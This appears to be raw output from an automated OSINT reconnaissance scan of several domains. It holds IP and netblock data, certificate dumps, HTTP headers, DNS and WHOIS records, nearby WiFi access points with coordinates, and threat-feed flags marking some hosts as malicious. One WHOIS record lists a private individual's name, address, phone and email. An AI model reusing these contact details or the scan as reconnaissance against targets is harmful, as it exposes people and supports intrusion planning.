0 3 0 None Italy 81.88.58.196 2022-12-18 00:11:48 Malicious IP on Same Subnet Yes Greensnow 0 0 2 0 None greensnow.co [20.192.0.0/10] https://blocklist.greensnow.co/greensnow.txt 20.192.0.0/10 2022-12-18 00:08:11 Netblock Membership No RIPE 6 0 1 0 None 20.192.0.0/10 20.195.209.219 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None ecuadopichi--ecuado30499f.repl.co 34.149.204.188 2022-12-18 00:03:16 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None stream.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:5f:2b:c4:e2:52:ac:ba:5b:55:25:2b:3c:57:78:0c:6b:4f Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Apr 9 16:42:21 2022 GMT Not After : Jul 8 16:42:20 2022 GMT Subject: CN=stream.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:f0:74:08:94:b1:0e:3a:f5:ab:5d:27:9f:a1:13: 26:4a:b8:88:b4:cd:16:65:28:29:5d:0c:65:22:96: 16:e9:20:24:42:3d:6d:35:0e:c1:28:8c:4a:28:75: c3:5b:63:81:00:5f:79:35:b2:8c:de:87:22:b0:ad: a6:67:62:40:d8:17:58:b3:75:0e:b6:2f:73:f2:ea: eb:e0:8f:76:26:50:9a:16:11:75:b8:95:2c:97:e5: b9:e5:63:e7:51:d3:eb:e7:99:34:6a:cf:cc:fb:cf: db:aa:47:5b:d5:56:1a:8d:93:2c:fd:ff:26:75:37: d0:62:e4:63:b7:38:a8:b2:e3:d7:82:92:52:ce:b0: af:e9:42:c7:ca:4f:21:55:20:92:35:54:9c:65:7a: ce:69:96:a3:18:10:90:ac:b1:94:6c:06:cb:1d:e6: f3:8c:63:be:4d:c3:b6:5c:e7:73:eb:aa:34:c4:16: b2:55:9f:e1:5e:c9:6e:3c:a6:a1:4e:ce:ba:1c:93: 9b:8f:97:87:77:b0:cc:86:0e:ec:a3:31:e9:6a:17: 0a:2c:ea:72:83:72:e9:ad:a4:a9:77:f3:4c:21:11: 4e:be:f0:d4:f6:9c:70:8a:00:15:78:65:11:81:45: 14:10:49:bf:49:44:94:90:4c:18:e2:6e:b5:c1:88: 5e:37 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: C9:18:99:93:EB:0E:8F:DB:EF:08:28:03:69:26:F5:7B:25:61:0A:39 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:stream.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 69:40:ed:22:fe:60:b0:02:ad:3a:4e:78:f4:bb:89:96:9b:b5: ab:72:8b:0b:df:3a:e4:b1:98:69:7b:5e:f5:09:60:f2:7d:89: d6:4c:d4:92:b7:7b:25:4a:8d:f7:24:18:e5:1e:dd:40:a6:e9: d8:00:0d:09:02:72:b2:7c:1b:ae:00:0b:34:5c:a9:e8:f3:b5: 24:0c:54:57:a3:b2:38:72:b7:2c:e5:ec:06:fe:84:a5:06:77: 1e:75:01:de:a0:8e:a6:1c:0f:c3:1f:cf:a5:46:73:df:e8:29: c9:f2:53:1b:60:56:ef:a2:a8:f8:bb:1d:d7:86:fe:80:75:97: e4:9c:94:44:f3:55:56:85:31:11:bc:51:28:73:2d:c4:06:9c: e3:59:07:bd:ef:a5:9a:4d:8c:29:86:3c:cf:72:5c:a8:09:99: a0:c1:3a:ca:77:e1:33:db:d8:bc:a1:0a:ed:05:40:f7:c4:fd: 61:82:b2:93:37:d2:a2:93:53:4d:c2:46:10:31:30:86:f7:2c: 13:5e:16:4e:f1:da:57:ba:4c:8f:70:fe:9c:d4:4d:8d:48:4c: 19:b9:9c:71:58:e6:d3:91:96:76:59:42:f8:54:b6:86:52:b4: 14:64:b1:08:ba:2f:27:33:22:9f:33:14:ec:1e:dd:aa:f2:97: b7:2b:3c:4f 2022-12-18 00:20:56 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 2606:4700:3031::ac43:93e6 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None infoworld (Net ID: 00:02:2D:04:D1:DB) 37.780462,-122.390564 2022-12-18 00:22:01 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77b1f860dd0c2bbd-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 2a06:98c1:3121::1 2022-12-18 00:21:41 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-11-20T15:07:59.768Z", "ip": "20.226.56.97", "location_updated_at": "2022-12-18T00:21:37.986540Z", "autonomous_system_updated_at": "2022-12-18T00:21:37.986540Z", "location": {"province": "Sao Paulo", "city": "Campinas", "country": "Brazil", "coordinates": {"latitude": -22.9035, "longitude": -47.0565}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "", "country_code": "BR", "timezone": "America/Sao_Paulo", "continent": "South America"}, "services": [], "autonomous_system": {"bgp_prefix": "20.192.0.0/10", "country_code": "US", "asn": 8075, "name": "MICROSOFT-CORP-MSN-AS-BLOCK", "description": "MICROSOFT-CORP-MSN-AS-BLOCK"}} 20.226.56.97 2022-12-18 00:07:17 Linked URL - External No Web Spider 0 0 2 0 None https://i.imgur.com/W2gQQnU.png http://misogyny.wtf:2020/parser 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 104.21.7.179 2022-12-18 00:04:38 Malicious IP Address Yes Maltiverse 0 1 2 0 None Maltiverse [188.114.97.0] 188.114.97.0 2022-12-18 00:12:24 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'SP', u'country_tld': u'.br', u'ip': u'20.226.56.97', u'currency_name': u'Real', u'currency': u'BRL', u'country_population': 209469333, u'country_code': u'BR', u'timezone': u'America/Sao_Paulo', u'city': u'Campinas', u'network': u'20.226.0.0/16', u'languages': u'pt-BR,es,en,fr', u'version': u'IPv4', u'latitude': -22.9035, u'in_eu': False, u'utc_offset': u'-0300', u'continent_code': u'SA', u'country_name': u'Brazil', u'country_capital': u'Brasilia', u'org': u'MICROSOFT-CORP-MSN-AS-BLOCK', u'postal': None, u'asn': u'AS8075', u'country': u'BR', u'region': u'Sao Paulo', u'longitude': -47.0565, u'country_calling_code': u'+55', u'country_area': 8511965.0, u'country_code_iso3': u'BRA'} 20.226.56.97 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None zoom (Net ID: 00:01:38:A4:44:3A) 37.780462,-122.390564 2022-12-18 00:04:28 Name Server (DNS NS Records) No DNS Raw Records 0 0 1 0 None journey.ns.cloudflare.com rasputain.fr 2022-12-18 00:12:26 Physical Location No ipapi.co 0 0 2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3031::6815:7b3 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet24CE (Net ID: 00:01:36:59:24:CC) 37.7803446,-122.3906132 2022-12-18 00:22:14 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 172.67.169.215 2022-12-18 00:21:34 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ae242be84c2331-ORD Content-Encoding: gzip 104.21.19.243 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.137.37 2022-12-18 00:16:54 Malicious Internet Name Yes CloudFlare Malware DNS 0 1 2 0 None Blocked by CloudFlare DNS [ftp.zerotwo-best-waifu.online] ftp.zerotwo-best-waifu.online 2022-12-18 00:22:14 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77ad7e4fd9eb22cf-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.169.215 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None yahvehseencargaradebendecirmehoymismo.dios12xx.repl.co 34.149.204.188 2022-12-18 00:20:47 Web Content Language No Language Detector 0 0 3 0 None English Not configured webmail
2022-12-18 00:18:03 Raw Data from RIRs No Tool - WhatWeb 1 0 2 0 None [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://webmail.zerotwo-best-waifu.online', u'http_status': 200, u'plugins': {u'JQuery': {u'version': [u'3.5.0']}, u'Script': {u'string': [u'text/javascript']}, u'Country': {u'string': [u'ITALY'], u'module': [u'IT']}, u'Title': {u'string': [u'Not configured webmail']}, u'HTML5': {}, u'IP': {u'string': [u'81.88.48.102']}, u'X-Frame-Options': {u'string': [u'SAMEORIGIN']}}}, {}] webmail.zerotwo-best-waifu.online 2022-12-18 00:09:50 Co-Hosted Site No HackerTarget 0 0 2 0 None baysicqua.ga 172.67.147.230 2022-12-18 00:24:03 Similar Domain - Whois No Whois 0 0 2 0 None Domain name: plague.nl Status: active Registrar: Sonexo B.V. Edeseweg 52 6721JX BENNEKOM Netherlands Abuse Contact: Creation Date: 2016-01-27 Updated Date: 2017-07-17 DNSSEC: yes Domain nameservers: ns1.sonexo.eu ns2.sonexo.com Record maintained by: NL Domain Registry Copyright notice No part of this publication may be reproduced, published, stored in a retrieval system, or transmitted, in any form or by any means, electronic, mechanical, recording, or otherwise, without prior permission of the Foundation for Internet Domain Registration in the Netherlands (SIDN). These restrictions apply equally to registrars, except in that reproductions and publications are permitted insofar as they are reasonable, necessary and solely in the context of the registration activities referred to in the General Terms and Conditions for .nl Registrars. Any use of this material for advertising, targeting commercial offers or similar activities is explicitly forbidden and liable to result in legal action. Anyone who is aware or suspects that such activities are taking place is asked to inform the Foundation for Internet Domain Registration in the Netherlands. (c) The Foundation for Internet Domain Registration in the Netherlands (SIDN) Dutch Copyright Act, protection of authors' rights (Section 10, subsection 1, clause 1). plague.nl 2022-12-18 00:04:28 Raw DNS Records No DNS Raw Records 0 0 1 0 None misogyny.wtf. 1800 IN TXT "v=spf1 include:spf.efwd.registrar-servers.com ~all" misogyny.wtf 2022-12-18 00:07:17 Linked URL - Internal No Web Spider 4 0 2 0 None http://misogyny.wtf/parser http://misogyny.wtf:2020/parser 2022-12-18 00:26:31 Physical Location No MetaDefender 0 0 2 0 None San Jose, United States 104.21.7.179 2022-12-18 00:10:04 Web Server No URLScan.io 0 1 1 0 None Werkzeug/2.0.3 Python/3.9.0 rasputain.fr 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None hj92.gh67.repl.co 34.149.204.188 2022-12-18 00:11:07 Similar Domain - Whois No Whois 2 0 2 0 None %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: tain.fr status: ACTIVE eppstatus: active hold: NO holder-c: SC54767-FRNIC admin-c: SC54767-FRNIC tech-c: K6635-FRNIC registrar: KIFCORP Expiry Date: 2023-03-01T08:35:38Z created: 2021-03-01T08:35:38Z last-update: 2022-03-01T08:36:40Z source: FRNIC nserver: ns1.alpesc.net nserver: ns2.alpesc.net source: FRNIC registrar: KIFCORP address: 78 RUE D ALEMBERT address: 38000 GRENOBLE country: FR phone: +33.458000007 e-mail: contact@kifcorp.fr website: https://www.kifdom.com/faq.php anonymous: No registered: 2014-12-22T00:00:00Z source: FRNIC nic-hdl: SC54767-FRNIC type: PERSON contact: Sebastien Chevillet address: 10 Rue de Penthievre address: 75008 Paris country: FR phone: +33.768936738 e-mail: contact@vosdomaines.com registrar: KIFCORP changed: 2022-10-17T08:04:47.27595Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligsource: REGISTRAR eligdate: 2021-06-25T00:00:00Z reachstatus: ok reachmedia: email reachsource: REGISTRAR reachdate: 2021-06-25T00:00:00Z source: FRNIC nic-hdl: K6635-FRNIC type: ORGANIZATION contact: KIFCORP address: KIFCORP address: 78 rue d'Alembert address: 38000 GRENOBLE country: FR phone: +33.458000007 e-mail: contact@kifcorp.fr registrar: KIFCORP changed: 2022-12-16T10:49:00.573083Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligsource: REGISTRY eligdate: 2021-08-10T00:00:00Z reachstatus: ok reachmedia: phone reachsource: REGISTRY reachdate: 2021-08-10T00:00:00Z source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:07.695058Z <<< raspu.tain.fr 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:8080 188.114.96.1 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b0ef6cacfce28b-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.19.243 2022-12-18 00:09:31 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'http', u'event_type': u'service', u'ip': u'172.67.169.215', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf139899b93230d079f165aebc0d', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'"Holocaustul, Un Avertisment Al Istoriei" (Prof. Mihai Chioveanu)', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'persvasscomfe.cf', u'summary': u'Date: Fri, 04 Nov 2022 13:43:30 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: ch1c=b\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=hGE4R3XNmrTCzrMsV4spPtkBhiWJx3T3UcuC151O1dDwBX8DahvVgvaHio9pmErRtfYdDc%2BExnYiNqawaxQcwAJoaSOziOyfdQnGFXuBNmOiRuGYsaLpr4sAtPisTCA3W1jU"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764dc76ed9d2cfa8-SJC\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: "Holocaustul, Un Avertisment Al Istoriei" (Prof. Mihai Chioveanu)', u'time': u'2022-11-04T13:43:29.694417328Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'172.67.169.215', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987319317d86e2d588a2b7f31fc7718ad4491369cb730d3a794a6', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'403 Error', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'aaja.co', u'*.aaja.co', u'sni.cloudflaressl.com'], u'cn': u'sni.cloudflaressl.com', u'valid': True, u'not_after': u'2023-02-17T23:59:59Z', u'key_size': 256, u'issuer_name': u'Cloudflare Inc ECC CA-3', u'fingerprint': u'c82791938f351011459e2059ed1d9149875c4c91b7d49ee13c9ee4c0e3d425e2', u'key_algo': u'ECDSA', u'not_before': u'2022-02-17T00:00:00Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u's.aaja.co', u'summary': u'Date: Thu, 03 Nov 2022 12:34:03 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nlast-modified: Sun, 19 Jun 2022 19:35:41 GMT\r\nvary: Accept-Encoding\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=j4DNccNYtwdSWQ9slXGg4CUji%2BOsreEoEqhE4cNFZlAHGxTC8Jf8GKUVg3bENrhtiebsgxkK%2BAeSfrMhC4wdbIRxPVa%2BuANSo%2FkMXIpHWrQgwkaImSFrq%2BA%2F%2FcU%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nStrict-Transport-Security: max-age=15552000; includeSubDomains; preload\r\nX-Content-Type-Options: nosniff\r\nServer: cloudflare\r\nCF-RAY: 76452451dd72caad-HAM\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: 403 Error\n\n2dc\r\n\n\n\n \n \n 403 Error\n \n \n \n\n\n\n\n

\n It appears you don\'t have
permission to access this page.\n

\n \n

\n 403 Error. Forbidden.\n

\n \n\n\n\n\r\n0\r\n\r\n', u'time': u'2022-11-03T12:34:01.823420181Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'172.67.169.215', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf137508286245ff17effeb94e13', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'\u0e2b\u0e19\u0e49\u0e32\u0e41\u0e23\u0e01 - iowstartwelllivewellagewell', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.iowstartwelllivewellagewell.com', u'iowstartwelllivewellagewell.com'], u'cn': u'*.iowstartwelllivewellagewell.com', u'valid': True, u'not_after': u'2023-01-23T04:13:32Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'67f9814a4751de3cf7acd0499b6961786bd24f1a2f5f8a087443f3712df54a3d', u'key_algo': u'ECDSA', u'not_before': u'2022-10-25T04:13:33Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'iowstartwelllivewellagewell.com', u'summary': u'Date: Thu, 03 Nov 2022 06:00:24 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nx-powered-by: PHP/8.0.25\r\nx-powered-by: PleskLin\r\nlast-modified: Wed, 02 Nov 2022 19:31:48 GMT\r\nvary: Accept-Encoding\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5NICZteL%2BtBr5A6IaDqm7mJy9WqFnhsmXDTWVKAWJguvpDi83GwQpr5LcrQaIaGPux2FihwvBdyWw5SN6POfw0vvErhnTUXXcimKp0A9FQno4Tbi6FVF%2F%2F0Xee24%2BBWYIFEhVh5LsML2wfaAZBLRjQTV"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 7642e3abdb529a39-FRA\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: \u0e2b\u0e19\u0e49\u0e32\u0e41\u0e23\u0e01 - iowstartwelllivewellagewell', u'time': u'2022-11-03T06:00:23.077103124Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'172.67.169.215', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc6856dcb97e498efbb733038dcd', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://iowstartwelllivewellagewell.com/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u' 172.67.169.215 2022-12-18 00:32:16 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: PLAGUE.TECH Registry Domain ID: D183124424-CNIC Registrar WHOIS Server: whois.west.cn Registrar URL: http://www.west.cn Updated Date: 2022-06-14T09:03:38.0Z Creation Date: 2020-04-17T02:15:35.0Z Registry Expiry Date: 2023-04-17T23:59:59.0Z Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD. Registrar IANA ID: 1556 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Wei Cao Registrant State/Province: Jiang Su Registrant Country: CN Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS4.MYHOSTADMIN.NET Name Server: NS5.MYHOSTADMIN.NET DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: abuse@west.cn Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:32:15.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: plague.tech Registry Domain ID: zd33450047986564 Registrar WHOIS Server: whois.west.cn Registrar URL: www.west.cn Updated Date: 2020-04-17T02:15:35.0Z Creation Date: 2020-04-17T02:15:35.0Z Registrar Registration Expiration Date: 2023-04-17T23:59:59.0Z Registrar: Chengdu west dimension digital technology Co., LTD Registrar IANA ID: 1556 Reseller: Domain Status: ok http://www.icann.org/epp#ok Registry Registrant ID: Not Available From Registry Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Jiang Su Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CN Registrant Phone: REDACTED FOR 